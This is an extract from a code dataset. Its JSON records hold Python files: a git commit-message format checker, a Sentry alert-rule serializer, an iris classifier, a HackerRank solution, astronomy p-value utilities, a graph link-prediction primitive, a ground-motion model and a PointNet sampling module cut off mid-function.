characters\n\t\t* Capitalise the subject line\n\t\t* Do not end the subject line with a period (ie '.')\n\t\t* Wrap text at 72 characters (don't let each line have more then 72 character) \n\t* We can write to check these rules are being followed or to throw an error \"\"\"\n\nimport sys\n\ndef main():\n\tmessage = \"\"\n\tcharCount = 0\n\tlineCount = 0\n\t\n\tfile = open(sys.argv[1], \"r\")\n\tmessage = file.read()\n\tmessageLength = len(message)\n\t\n\tfor i in range(0, messageLength): \n\t\tif message[i] == '\\n': #gives us raw character\n\t\t\tlineCount += 1\n\t\t\tcharCount = 0\n\t\t\tcontinue\n\t\t\t\n\t\tif(message[i] == '.' and lineCount == 0): #4) Do not end the subject line with a period (ie '.')\n\t\t\tprint(\"The subjects ends with a period!\")\n\t\t\treturn 1\n\t\t\n\t\tif lineCount == 1 and message[i] != '\\n':\n\t\t\tprint(\"The line between the subject and body (line 2) is not blank!\")\n\t\t\treturn 1\n\t\t\t\t\t\t\n\t\tif lineCount == 0 and charCount == 0 and message[i].isupper() == False: #3) Capitalise the subject line\n\t\t\tprint(\"Subject line is not capitalised!\")\n\t\t\treturn 1\n\t\t\n\t\tcharCount += 1 \n\t\tif charCount > 50 and lineCount == 0: #2) Limit the subject line to 50 characters\n\t\t\tprint(\"Subject line is over 50 characters!\")\n\t\t\treturn 1\n\t\t\n\t\tif lineCount >= 2 and charCount > 72: #5) Wrap text at 72 characters (don't let each line have more then 72 character) \n\t\t\tprint(\"Body text is over 72 characters!\")\n\t\t\treturn 1\n\t\t\n\tif lineCount < 2: #5) Wrap text at 72 characters (don't let each line have more then 72 character) \n\t\tprint(\"There is no body of text!\")\n\t\treturn 1\n\t\n\tprint(\"No message error detected\")\n\treturn 0\n\t\t\nif __name__ == \"__main__\":\n\tsys.exit(main())","sub_path":".githooks/commit-msg.py","file_name":"commit-msg.py","file_ext":"py","file_size_in_byte":2037,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"508001208","text":"# uncompyle6 version 3.7.4\n# Python bytecode 2.7 (62211)\n# Decompiled from: Python 3.6.9 (default, Apr 18 2020, 01:56:04) \n# [GCC 8.4.0]\n# Embedded file name: /usr/src/sentry/src/sentry/incidents/endpoints/serializers.py\n# Compiled at: 2019-08-23 05:13:18\nfrom __future__ import absolute_import\nfrom datetime import timedelta\nimport six\nfrom enum import Enum\nfrom rest_framework import serializers\nfrom sentry.api.serializers.rest_framework.base import CamelSnakeModelSerializer\nfrom sentry.incidents.models import AlertRule, AlertRuleAggregations, AlertRuleThresholdType\nfrom sentry.incidents.logic import AlertRuleNameAlreadyUsedError, create_alert_rule, update_alert_rule\n\nclass AlertRuleSerializer(CamelSnakeModelSerializer):\n aggregations = serializers.ListField(child=serializers.IntegerField())\n\n class Meta:\n model = AlertRule\n fields = [\n 'name',\n 'threshold_type',\n 'query',\n 'time_window',\n 'alert_threshold',\n 'resolve_threshold',\n 'threshold_period',\n 'aggregations']\n extra_kwargs = {'query': {'allow_blank': True, 'required': True}, 'threshold_period': {'default': 1, 'min_value': 1, 'max_value': 20}, 'alert_threshold': {'required': True}, 'resolve_threshold': {'required': True}, 'time_window': {'min_value': 1, \n 'max_value': int(timedelta(days=1).total_seconds() / 60), \n 'required': True}, \n 'aggregations': {'min_length': 1, 'max_length': 10, 'required': True}, 'name': {'min_length': 1, 'max_length': 64}}\n\n def validate_threshold_type(self, threshold_type):\n try:\n return AlertRuleThresholdType(threshold_type)\n except ValueError:\n raise serializers.ValidationError('Invalid threshold type, valid values are %s' % [ item.value for item in AlertRuleThresholdType ])\n\n def validate_aggregations(self, aggregations):\n try:\n return [ AlertRuleAggregations(agg) for agg in aggregations ]\n except ValueError:\n raise serializers.ValidationError('Invalid aggregation, valid values are %s' % [ item.value for item in AlertRuleAggregations ])\n\n def create(self, validated_data):\n try:\n return create_alert_rule(project=self.context['project'], **validated_data)\n except AlertRuleNameAlreadyUsedError:\n raise serializers.ValidationError('This name is already in use for this project')\n\n def _remove_unchanged_fields(self, instance, validated_data):\n for field_name, value in list(six.iteritems(validated_data)):\n if isinstance(value, Enum):\n value = value.value\n elif field_name == 'aggregations':\n value = [ item.value for item in value ]\n if getattr(instance, field_name) == value:\n validated_data.pop(field_name)\n\n return validated_data\n\n def update(self, instance, validated_data):\n validated_data = self._remove_unchanged_fields(instance, validated_data)\n return update_alert_rule(instance, **validated_data)","sub_path":"pycfiles/sentry-10.0.0-py27-none-any/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":3107,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"524783810","text":"import tensorflow as tf\nimport numpy as np\nimport os\n\n# Data sets\nIRIS_TRAINING = os.path.join(\"iris\", \"iris_training.csv\")\nIRIS_TEST = os.path.join(\"iris\", \"iris_test.csv\")\n\n# Load datasets.\ntraining_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TRAINING,\n target_dtype=np.int,\n features_dtype=np.float32)\ntest_set = tf.contrib.learn.datasets.base.load_csv_with_header(\n filename=IRIS_TEST,\n target_dtype=np.int,\n features_dtype=np.float32)\n\n# Specify that all features have real-value data\nfeature_columns = [tf.contrib.layers.real_valued_column(\"\", dimension=4)]\n\nclassifier = tf.contrib.learn.DNNClassifier(\n\tfeature_columns=feature_columns,\n\thidden_units=[10, 20, 10],\n\tn_classes=3,\n\tmodel_dir=\"/tmp/iris_model\")\n\n# Fit model.\nclassifier.fit(input_fn=lambda: (tf.constant(training_set.data), tf.constant(training_set.target)),\n steps=2000)\n\n# Evaluate accuracy.\naccuracy_score = classifier.evaluate(x=test_set.data, y=test_set.target)['accuracy']\nprint('Accuracy: {0:f}'.format(accuracy_score))\n\n# Classify two new flower samples.\nnew_samples = np.array(\n [[6.4, 3.2, 4.5, 1.5], [5.8, 3.1, 5.0, 1.7]], dtype=float)\ny = list(classifier.predict(new_samples, as_iterable=True))\nprint('Predictions: {}'.format(str(y)))\n","sub_path":"tensorflow_examples/iris_classifier.py","file_name":"iris_classifier.py","file_ext":"py","file_size_in_byte":1283,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"486938078","text":"#!/bin/python\n\nimport math\nimport os\nimport random\nimport re\nimport sys\n\n# function to calculate the appearance of each value in array\n# returns dictionary\ndef countValues(ar):\n values = {}\n\n for v in ar:\n if v in values:\n values[v] += 1\n else:\n values[v] = 1\n\n return values\n\n# function to generate the result\ndef sockMerchant(n, ar):\n # create dictionary with all values and their frequency\n values = countValues(ar)\n\n # for each value in values:\n # if it's even, we can form (value / 2) pairs\n # if it's odd, we can form ((value - 1) / 2) pairs (and one sock will be left)\n # => so we can divide value by 2 and round to the lowest number by applying int()\n return sum(list(map(lambda x: int(x / 2), values.values())))\n\nif __name__ == '__main__':\n fptr = open(os.environ['OUTPUT_PATH'], 'w')\n n = int(raw_input())\n ar = map(int, raw_input().rstrip().split())\n result = sockMerchant(n, ar)\n\n fptr.write(str(result) + '\\n')\n fptr.close()","sub_path":"Warm-up Challenges/Sock Merchant.py","file_name":"Sock Merchant.py","file_ext":"py","file_size_in_byte":1021,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"92"} +{"seq_id":"63280277","text":"__author__ = 'pdh21'\nfrom astropy.io import fits\nimport scipy.stats as st\nimport numpy as np\nfrom astropy.io import fits\n\n\ndef ymod_map(prior,flux):\n \"\"\"Create replicated model map (no noise or background) i.e. A*f\n\n :param prior: prior class\n :param flux: flux vector\n :return: map array, in same format as prior.sim\n \"\"\"\n from scipy.sparse import coo_matrix\n\n f=coo_matrix((flux, (range(0,prior.nsrc),np.zeros(prior.nsrc))), shape=(prior.nsrc, 1))\n A=coo_matrix((prior.amat_data, (prior.amat_row, prior.amat_col)), shape=(prior.snpix, prior.nsrc))\n rmap_temp=(A*f)\n #pred_map=np.empty_like(prior.im)\n #pred_map[:,:]=0.0\n #pred_map[prior.sy_pix,prior.sx_pix]=np.asarray(rmap_temp.todense()).reshape(-1)#+np.random.randn(prior.snpix)*prior.snim\n\n return np.asarray(rmap_temp.todense())\n\n\ndef post_rep_map(prior,mod_map,back,conf_noise):\n return mod_map+back+np.random.normal(scale=np.sqrt(prior.snim**2+conf_noise**2))\n\ndef Bayesian_pvals(prior,post_rep_map):\n pval=np.empty_like(prior.sim)\n for i in range(0,prior.snpix):\n ind=post_rep_map[i,:] 2*T_rep\n Bayes_pval_res_vals[i]=sum(ind_T)/np.float(post_rep_map.shape[1])\n return Bayes_pval_res_vals\n\ndef post_rep_map(prior,mod_map,back,conf_noise):\n return mod_map+back+np.random.normal(scale=np.sqrt(prior.snim**2+conf_noise**2))\n\n\ndef make_Bayesian_pval_maps(prior,post_rep_map):\n import scipy.stats as st\n pval=np.empty_like(prior.sim)\n for i in range(0,prior.snpix):\n ind=post_rep_map[i,:] None:\n super().__init__(hyperparams=hyperparams, random_seed=random_seed, docker_containers=docker_containers)\n self._fitted: bool = False\n self._inner_products: container.List = []\n self._embeddings: container.List = []\n\n def produce(self, *, inputs: Inputs, timeout: float = None, iterations: int = None) -> CallResult[Outputs]:\n if not self._fitted:\n raise ValueError(\"Not fitted\")\n \n np.random.seed(self.random_seed)\n \n csv = inputs[1]\n \n\n # print(csv, file=sys.stderr)\n csv_headers = csv.columns\n for header in csv_headers:\n if header[:6] == \"source\":\n SOURCE = header\n elif header[:6] == \"target\":\n TARGET = header\n \n source_nodeID = np.array(csv[SOURCE]).astype(int)\n target_nodeID = np.array(csv[TARGET]).astype(int)\n \n try:\n int(np.array(csv['linkType'])[0])\n except:\n csv['linkType'] = np.zeros(len(source_nodeID))\n \n link_types = np.array(csv['linkType']).astype(int)\n\n n_links = len(self._inner_products) - 1\n n_nodes = int(self._embeddings.shape[0] / n_links)\n\n n_preds = csv.shape[0]\n\n predictions = np.zeros(n_preds)\n\n global_noexists = self._inner_products[-1][0]\n global_exists = self._inner_products[-1][1]\n\n # The following code is used for \"global\" classification only; i.e. we ignore edge type training data\n for i in range(n_preds):\n temp_source = source_nodeID[i]\n temp_target = target_nodeID[i]\n temp_link = link_types[i]\n temp_inner_product = self._embeddings[temp_link*n_nodes + temp_source-1] @ self._embeddings[temp_link*n_nodes + temp_target-1]\n temp_noexists = self._inner_products[temp_link][0]\n temp_exists = self._inner_products[temp_link][1]\n\n # There are three 'degenerate' cases --\n # 1) Both the exists and no exists lists are empty (first 'if')\n # 2/3) One but not the other is empty ('elif')\n # if len(temp_noexists) == 0 and len(temp_exists) == 0:\n rank_noexists = np.sum(temp_inner_product > global_noexists)\n quantile_noexists = rank_noexists / len(global_noexists)\n\n rank_exists = np.sum(temp_inner_product > global_noexists)\n quantile_exists = rank_exists / len(global_exists) \n\n if abs(quantile_noexists - 1/2) < abs(quantile_exists - 1/2):\n predictions[i] = int(0)\n elif abs(quantile_noexists - 1/2) > abs(quantile_exists - 1/2):\n predictions[i] = int(1)\n else:\n predictions[i] = int(np.random.binomial(1, 0.5))\n \n csv['linkExists'] = predictions.astype(int)\n outputs = container.DataFrame(csv[['d3mIndex', 'linkExists']])\n\n return base.CallResult(outputs)\n\n def fit(self, *, timeout: float = None, iterations: int = None) -> base.CallResult[None]:\n if self._fitted:\n return base.CallResult(None)\n\n embeddings = self._training_inputs[0]\n csv = self._training_inputs[1]\n n_nodes, n_links = self._training_inputs[2][0], self._training_inputs[2][1]\n\n n_info = csv.shape[0]\n ranks = [[[], []] for i in range(n_links + 1)]\n\n try:\n int(np.array(csv['linkType'])[0])\n except:\n csv['linkType'] = np.zeros(n_info)\n\n # print(csv, file=sys.stderr)\n csv_headers = csv.columns\n for header in csv_headers:\n if header[:6] == \"source\":\n SOURCE = header\n elif header[:6] == \"target\":\n TARGET = header\n\n for i in range(n_info):\n temp_link = int(np.array(csv['linkType'])[i])\n temp_exists = int(np.array(csv['linkExists'])[i])\n temp_source = int(np.array(csv[SOURCE])[i])\n temp_target = int(np.array(csv[TARGET])[i])\n temp_dot = embeddings[temp_link*n_nodes + temp_source - 1] @ embeddings[temp_link*n_nodes + temp_target - 1]\n ranks[temp_link][temp_exists].append(temp_dot)\n ranks[-1][temp_exists].append(temp_dot)\n\n for i in range(len(ranks)):\n ranks[i][0] = np.sort(ranks[i][0])\n ranks[i][1] = np.sort(ranks[i][1])\n\n self._embeddings = embeddings\n self._inner_products = ranks\n\n self._fitted = True\n\n return base.CallResult(None)\n\n def set_training_data(self, *, inputs: Inputs) -> None:\n self._training_inputs = inputs\n\n def get_params(self) -> Params:\n if not self._fitted:\n raise ValueError(\"Fit not performed.\")\n\n return Params(\n inner_products = self._inner_products,\n embeddings = self._embeddings\n )\n\n def set_params(self, *, params: Params) -> None:\n self._fitted = True\n self._inner_products = params['inner_products']\n\n self._embeddings = params['embeddings']\n","sub_path":"build/lib/jhu_primitives/link_pred_rc/link_pred_rc.py","file_name":"link_pred_rc.py","file_ext":"py","file_size_in_byte":8471,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"465136529","text":"#!/usr/bin/env python\n# encoding: utf-8\n\n\"\"\"Model for the Campbell and Bozorgnia (2014) ground motion model.\"\"\"\n\nfrom __future__ import division\n\nimport logging\n\nimport numpy as np\n\nfrom . import model\nfrom .chiou_youngs_2014 import ChiouYoungs2014 as CY14\n\n__author__ = 'Albert Kottke'\n\n\nclass CampbellBozorgnia2014(model.Model):\n \"\"\"Campbell and Bozorgnia (2014, :cite:`campbell14`) model.\n\n This model was developed for active tectonic regions as part of the\n NGA-West2 effort.\n \"\"\"\n\n NAME = 'Campbell & Bozorgnia (2014)'\n ABBREV = 'CB14'\n\n # Reference velocity (m/sec)\n V_REF = 1100.\n\n # Load the coefficients for the model\n COEFF = model.load_data_file('campbell_bozorgnia_2014.csv', 2)\n\n PERIODS = COEFF['period']\n\n # Period independent model coefficients\n COEFF_C = 1.88\n COEFF_N = 1.18\n COEEF_H_4 = 1\n\n INDICES_PSA = np.arange(21)\n INDEX_PGA = -2\n INDEX_PGV = -1\n\n PARAMS = [\n model.NumericParameter('depth_1_0', False),\n model.NumericParameter('depth_2_5', False, 0, 10),\n model.NumericParameter('depth_bor', False),\n model.NumericParameter('depth_bot', False, default=15.),\n model.NumericParameter('depth_hyp', False, 0, 20),\n model.NumericParameter('depth_tor', False, 0, 20),\n model.NumericParameter('dip', True, 15, 90),\n model.NumericParameter('dist_jb', True),\n model.NumericParameter('dist_rup', True, None, 300),\n model.NumericParameter('dist_x', True),\n model.NumericParameter('mag', True, 3.3, 8.5),\n model.NumericParameter('v_s30', True, 150, 1500),\n model.NumericParameter('width', False),\n\n model.CategoricalParameter(\n 'region', False,\n ['global', 'california', 'japan', 'italy', 'china'], 'global'),\n model.CategoricalParameter('mechanism', True, ['SS', 'NS', 'RS']),\n ]\n\n def _check_inputs(self, **kwds):\n super(CampbellBozorgnia2014, self)._check_inputs(**kwds)\n p = self.params\n\n for mech, limit in [('SS', 8.5), ('RS', 8.0), ('NS', 7.5)]:\n if mech == p['mechanism'] and p['mag'] > limit:\n logging.warning(\n 'Magnitude of %g is greater than the recommended limit of'\n '%g for %s style faults',\n p['mag'], limit, mech\n )\n\n if p['depth_2_5'] is None:\n p['depth_2_5'] = self.calc_depth_2_5(\n p['v_s30'], p['region'], p['depth_1_0'])\n\n if p['depth_tor'] is None:\n p['depth_tor'] = CY14.calc_depth_tor(p['mag'], p['mechanism'])\n\n if p['width'] is None:\n p['width'] = CampbellBozorgnia2014.calc_width(\n p['mag'], p['dip'], p['depth_tor'], p['depth_bot'])\n\n if p['depth_bor'] is None:\n p['depth_bor'] = self.calc_depth_bor(\n p['depth_tor'], p['dip'], p['width'])\n\n if p['depth_hyp'] is None:\n p['depth_hyp'] = CampbellBozorgnia2014.calc_depth_hyp(\n p['mag'], p['dip'], p['depth_tor'], p['depth_bor'])\n\n def __init__(self, **kwds):\n \"\"\"Compute the response predicted the Campbell and Bozorgnia (2014)\n ground motion model.\n\n Keyword Args:\n depth_1_0 (Optional[float]): depth to the 1.0 km∕s shear-wave\n velocity horizon beneath the site, :math:`Z_{1.0}` in (km).\n Used to estimate `depth_2_5`.\n\n depth_2_5 (Optional[float]): depth to the 2.5 km∕s shear-wave\n velocity horizon beneath the site, :math:`Z_{2.5}` in (km).\n If *None*, then it is computed from `depth_1_0` or `v_s30`\n and the `region` parameter.\n\n depth_tor (Optional[float]): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km). If *None*, then the average\n model is used.\n\n depth_bor (Optional[float]): depth to the bottom of the rupture\n plane (:math:`Z_{bor}`, km). If *None*, then the average\n model is used.\n\n depth_bot (Optional[float]): depth to bottom of seismogenic crust\n (km). Used to calculate fault width if none is specified. If\n *None*, then a value of 15 km is used.\n\n depth_hyp (Optional[float]): depth of the hypocenter (km). If\n *None*, then the model average is used.\n\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n dist_jb (float): Joyner-Boore distance to the rupture plane\n (:math:`R_\\\\text{JB}`, km)\n\n dist_rup (float): closest distance to the rupture plane\n (:math:`R_\\\\text{rup}`, km)\n\n dist_x (float): site coordinate measured perpendicular to the\n fault strike from the fault line with the down-dip direction\n being positive (:math:`R_x`, km).\n\n mag (float): moment magnitude of the event (:math:`M_w`)\n\n mechanism (str): fault mechanism. Valid values: \"SS\", \"NS\", \"RS\".\n\n region (Optional[str]): region. Valid values: \"california\",\n \"china\", \"italy\", \"japan\". If *None*, then \"california\" is\n used as a default value.\n\n v_s30 (float): time-averaged shear-wave velocity over the top 30 m\n of the site (:math:`V_{s30}`, m/s).\n\n width (Optional[float]): Down-dip width of the fault. If *None*,\n then the model average is used.\n \"\"\"\n super(CampbellBozorgnia2014, self).__init__(**kwds)\n p = self.params\n\n pga_ref = np.exp(\n self._calc_ln_resp(np.nan, self.V_REF)[self.INDEX_PGA])\n\n self._ln_resp = self._calc_ln_resp(pga_ref, p['v_s30'])\n self._ln_std = self._calc_ln_std(pga_ref)\n\n def _calc_ln_resp(self, pga_ref, v_s30):\n \"\"\"Calculate the natural logarithm of the response.\n\n Args:\n pga_ref (float): peak ground acceleration (g) at the reference\n condition. If :class:`np.nan`, then no site term is applied.\n\n v_s30 (float): time-averaged shear-wave velocity over the top 30 m\n of the site (:math:`V_{s30}`, m/s).\n\n Returns:\n :class:`np.array`: Natural log of the response.\n \"\"\"\n p = self.params\n c = self.COEFF\n\n # Magnitude term\n f_mag = c.c_0 + c.c_1 * p['mag']\n for min_mag, slope in ([4.5, c.c_2], [5.5, c.c_3], [6.5, c.c_4]):\n if min_mag < p['mag']:\n f_mag += slope * (p['mag'] - min_mag)\n else:\n break\n\n # Geometric attenuation term\n f_dis = (c.c_5 + c.c_6 * p['mag']) * np.log(np.sqrt(\n p['dist_rup'] ** 2 + c.c_7 ** 2\n ))\n\n # Style of faulting term\n taper = np.clip(p['mag'] - 4.5, 0, 1)\n if p['mechanism'] == 'RS':\n f_flt = c.c_8 * taper\n elif p['mechanism'] == 'NS':\n f_flt = c.c_9 * taper\n else:\n f_flt = 0\n\n # Hanging-wall term\n R_1 = p['width'] * np.cos(np.radians(p['dip']))\n R_2 = 62 * p['mag'] - 350\n if p['dist_x'] < 0:\n f_hngRx = 0\n elif p['dist_x'] <= R_1:\n ratio = p['dist_x'] / R_1\n f_hngRx = c.h_1 + c.h_2 * ratio + c.h_3 * ratio ** 2\n else:\n ratio = (p['dist_x'] - R_1) / (R_2 - R_1)\n f_hngRx = np.maximum(0, c.h_4 + c.h_5 * ratio + c.h_6 * ratio ** 2)\n\n if p['dist_rup'] == 0:\n f_hngRrup = 1\n else:\n f_hngRrup = (p['dist_rup'] - p['dist_jb']) / p['dist_rup']\n\n if p['mag'] <= 5.5:\n f_hngM = 0\n else:\n f_hngM = \\\n np.minimum(p['mag'] - 5.5, 1) * (1 + c.a_2 * (p['mag'] - 6.5))\n\n f_hngZ = 0 if p['depth_tor'] > 16.66 else 1 - 0.06 * p['depth_tor']\n f_hngDip = (90 - p['dip']) / 45\n\n f_hng = c.c_10 * f_hngRx * f_hngRrup * f_hngM * f_hngZ * f_hngDip\n\n # Site term\n f_site = np.zeros_like(c.period)\n vs_ratio = v_s30 / c.k_1\n mask = (v_s30 <= c.k_1)\n f_site[mask] = (\n c.c_11 * np.log(vs_ratio) +\n c.k_2 * (np.log(pga_ref +\n self.COEFF_C * vs_ratio ** self.COEFF_N) -\n np.log(pga_ref + self.COEFF_C))\n )[mask]\n f_site[~mask] = (\n (c.c_11 + c.k_2 * self.COEFF_N) * np.log(vs_ratio)\n )[~mask]\n\n if p['region'] == 'japan':\n # Apply regional correction for Japan\n if v_s30 <= 200:\n f_site += (\n (c.c_12 + c.k_2 * self.COEFF_N) *\n (np.log(vs_ratio) - np.log(200 / c.k_1))\n )\n else:\n f_site += (c.c_13 + c.k_2 * self.COEFF_N) * np.log(vs_ratio)\n\n # Basin response term\n if np.isnan(pga_ref):\n # Use model to compute depth_2_5 for the reference velocity case\n depth_2_5 = self.calc_depth_2_5(v_s30, p['region'])\n else:\n depth_2_5 = p['depth_2_5']\n\n if depth_2_5 <= 1:\n f_sed = c.c_14 * (depth_2_5 - 1)\n if p['region'] == 'japan':\n f_sed += c.c_15 * (depth_2_5 - 1)\n elif depth_2_5 <= 3:\n f_sed = 0\n else:\n f_sed = (c.c_16 * c.k_3 * np.exp(-0.75) *\n (1 - np.exp(-0.25 * (depth_2_5 - 3))))\n\n # Hypocentral depth term\n f_hypH = np.clip(p['depth_hyp'] - 7, 0, 13)\n f_hypM = c.c_17 + (c.c_18 - c.c_17) * np.clip(p['mag'] - 5.5, 0, 1)\n f_hyp = f_hypH * f_hypM\n\n # Fault dip term\n f_dip = c.c_19 * p['dip'] * np.clip(5.5 - p['mag'], 0, 1)\n\n # Anaelastic attenuation term\n if p['region'] in ['japan', 'italy']:\n dc_20 = c.dc_20jp\n elif p['region'] == ['china']:\n dc_20 = c.dc_20ch\n else:\n dc_20 = c.dc_20ca\n\n f_atn = (c.c_20 + dc_20) * max(p['dist_rup'] - 80, 0)\n\n ln_resp = (f_mag + f_dis + f_flt + f_hng + f_site + f_sed + f_hyp +\n f_dip + f_atn)\n return ln_resp\n\n def _calc_ln_std(self, pga_ref):\n \"\"\"Calculate the logarithmic standard deviation.\n\n Args:\n pga_ref (float): peak ground acceleration (g) at the reference\n condition.\n\n Returns:\n :class:`np.array`: Logarithmic standard deviation.\n \"\"\"\n p = self.params\n c = self.COEFF\n\n tau_lnY = c.tau_2 + (c.tau_1 - c.tau_2) * np.clip(5.5 - p['mag'], 0, 1)\n phi_lnY = c.phi_2 + (c.phi_1 - c.phi_2) * np.clip(5.5 - p['mag'], 0, 1)\n\n vs_ratio = p['v_s30'] / c.k_1\n alpha = np.zeros_like(c.period)\n mask = p['v_s30'] < c.k_1\n alpha[mask] = (\n c.k_2 * pga_ref * (\n (pga_ref + self.COEFF_C * vs_ratio ** self.COEFF_N) ** (-1) -\n (pga_ref + self.COEFF_C) ** -1)\n )[mask]\n\n tau_lnPGA = tau_lnY[self.INDEX_PGA]\n tau = np.sqrt(tau_lnY ** 2 + alpha ** 2 * tau_lnPGA ** 2 +\n 2 * alpha * c.rho_lnPGAlnY * tau_lnY * tau_lnPGA)\n\n phi_lnPGA = phi_lnY[self.INDEX_PGA]\n phi_lnAF_PGA = self.COEFF['phi_lnAF'][self.INDEX_PGA]\n phi_lnPGA_B = np.sqrt(phi_lnPGA ** 2 - phi_lnAF_PGA ** 2)\n phi_lnY_B = np.sqrt(phi_lnY ** 2 - c.phi_lnAF ** 2)\n\n phi = np.sqrt(phi_lnY_B ** 2 + c.phi_lnAF ** 2 +\n alpha ** 2 * (phi_lnPGA ** 2 - phi_lnAF_PGA ** 2) +\n 2 * alpha * c.rho_lnPGAlnY * phi_lnY_B * phi_lnPGA_B)\n\n ln_std = np.sqrt(phi ** 2 + tau ** 2)\n\n return ln_std\n\n @staticmethod\n def calc_depth_2_5(v_s30, region='global', depth_1_0=None):\n \"\"\"Calculate the depth to a shear-wave velocity of 2.5 km/sec\n (:math:`Z_{2.5}`).\n\n Provide either `v_s30` or `depth_1_0`.\n\n Args:\n v_s30 (Optional[float]): time-averaged shear-wave velocity over\n the top 30 m of the site (:math:`V_{s30}`, m/s).\n\n Keyword Args:\n region (Optional[str]): region of the basin model. Valid values:\n \"california\", \"japan\".\n\n depth_1_0 (Optional[float]): depth to the 1.0 km∕s shear-wave\n velocity horizon beneath the site, :math:`Z_{1.0}` in (km).\n\n Returns:\n float: estimated depth to a shear-wave velocity of 2.5 km/sec\n (km).\n \"\"\"\n if v_s30:\n param = v_s30\n if region == 'japan':\n # From equation 6.10 on page 63\n intercept = 5.359\n slope = 1.102\n else:\n # From equation 6.9 on page 63\n intercept = 7.089\n slope = 1.144\n\n # Global model\n # Not supported by NGA-West2 spreadsheet, and therefore removed.\n # foo = 6.510\n # bar = 1.181\n elif depth_1_0:\n param = depth_1_0\n if region == 'japan':\n # From equation 6.13 on page 64\n intercept = 0.408\n slope = 1.745\n else:\n # From equation 6.12 on page 64\n intercept = 1.392\n slope = 1.798\n\n # Global model\n # Not supported by NGA-West2 spreadsheet, and therefore removed.\n # foo = 0.748\n # bar = 2.128\n else:\n raise NotImplementedError\n\n return np.exp(intercept - slope * np.log(param))\n\n @staticmethod\n def calc_depth_hyp(mag, dip, depth_tor, depth_bor):\n \"\"\"Estimate the depth to hypocenter.\n\n Args:\n mag (float): moment magnitude of the event (:math:`M_w`)\n\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n depth_tor (float): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km).\n\n depth_bor (float): depth to the bottom of the rupture\n plane (:math:`Z_{bor}`, km).\n\n Returns:\n float: estimated hypocenter depth (km)\n \"\"\"\n # Equations 35, 36, and 37 of journal article\n ln_dZ = min(\n min(-4.317 + 0.984 * mag, 2.325) +\n min(0.0445 * (dip - 40), 0),\n np.log(0.9 * (depth_bor - depth_tor))\n )\n\n depth_hyp = depth_tor + np.exp(ln_dZ)\n\n return depth_hyp\n\n @staticmethod\n def calc_width(mag, dip, depth_tor, depth_bot=15.0):\n \"\"\"Estimate the fault width using Equation (39) of CB14.\n\n Args:\n mag (float): moment magnitude of the event (:math:`M_w`)\n\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n depth_tor (float): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km).\n\n Keyword Args:\n depth_bot (Optional[float]): depth to bottom of seismogenic crust\n (km). Used to calculate fault width if none is specified. If\n *None*, then a value of 15 km is used.\n\n Returns:\n float: estimated fault width (km)\n \"\"\"\n return min(\n np.sqrt(10 ** ((mag - 4.07) / 0.98)),\n (depth_bot - depth_tor) / np.sin(np.radians(dip))\n )\n\n @staticmethod\n def calc_depth_bor(depth_tor, dip, width):\n \"\"\"Compute the depth to bottom of the rupture (km).\n\n Args:\n dip (float): fault dip angle (:math:`\\phi`, deg).\n\n depth_tor (float): depth to the top of the rupture\n plane (:math:`Z_{tor}`, km).\n\n width (float): Down-dip width of the fault.\n\n Returns:\n float: depth to bottom of the fault rupture (km)\n \"\"\"\n return depth_tor + width * np.sin(np.radians(dip))\n","sub_path":"pygmm/campbell_bozorgnia_2014.py","file_name":"campbell_bozorgnia_2014.py","file_ext":"py","file_size_in_byte":15770,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"93"} +{"seq_id":"265187747","text":"import torch\nimport faiss\nimport numpy as np\n\n\nclass Conv1d(torch.nn.Module):\n def __init__(self, in_channle, out_channel, kernel_size=1):\n super(Conv1d, self).__init__()\n self.conv = torch.nn.Conv1d(in_channle, out_channel, kernel_size)\n self.bn = torch.nn.BatchNorm1d(out_channel)\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.bn(self.conv(x)))\n return x\n\n\nclass Linear(torch.nn.Module):\n def __init__(self, in_channle, out_channel):\n super(Linear, self).__init__()\n self.fc = torch.nn.Linear(in_channle, out_channel)\n self.bn = torch.nn.BatchNorm1d(out_channel)\n self.relu = torch.nn.ReLU()\n\n def forward(self, x):\n x = self.relu(self.bn(self.fc(x)))\n return x\n\n\nclass Pointnet(torch.nn.Module):\n def __init__(self, npoints, nfeature, mlp):\n super(Pointnet, self).__init__()\n self.fc = torch.nn.Sequential(\n Conv1d(nfeature, mlp[0]),\n Conv1d(mlp[0], mlp[1]),\n Conv1d(mlp[1], mlp[2]),\n torch.nn.MaxPool1d(npoints)\n )\n\n def forward(self, x):\n x = x.transpose(1, 2)\n x = self.fc(x)\n return x\n\ndef sample(xyz, group_num):\n '''\n random sample points\n input:\n xyz: batch_size * npoints * 3\n cpoint: center num\n return: \n center_xyz: batch_size * group_num * 3\n '''\n batch_size = xyz.size(0)\n npoints = xyz.size(1)\n center_xyz = torch.randn(batch_size, group_num, 3).cuda(xyz.get_device())\n for batch in range(batch_size):\n index = np.arange(npoints)\n np.random.shuffle(index)\n index = torch.from_numpy(index[:group_num])\n center = xyz[batch][index][:]\n center_xyz[batch] = center\n return center_xyz\n\ndef group(center_xyz, xyz, feature, group_size, index):\n '''\n use knn divide group\n input:\n center_xyz: batch_size * group_num * 3\n xyz: batch_size * npoints * 3\n feature: batch_size * npoints * nfeature\n group_size: int\n return:\n group_xyz: batch_size * group_num * group_size * 3\n group_feature: batch_size * group_num * group_size * nfeature\n '''\n batch_size = center_xyz.size()[0]\n group_num = center_xyz.size()[1]\n nfeature = feature.size()[2]\n group_xyz = torch.rand(batch_size, group_num, group_size, 3)\n group_feature = torch.rand(batch_size, group_num, group_size, nfeature).cuda(xyz.get_device())\n for batch in range(batch_size):\n center = center_xyz[batch]\n index.reset()\n 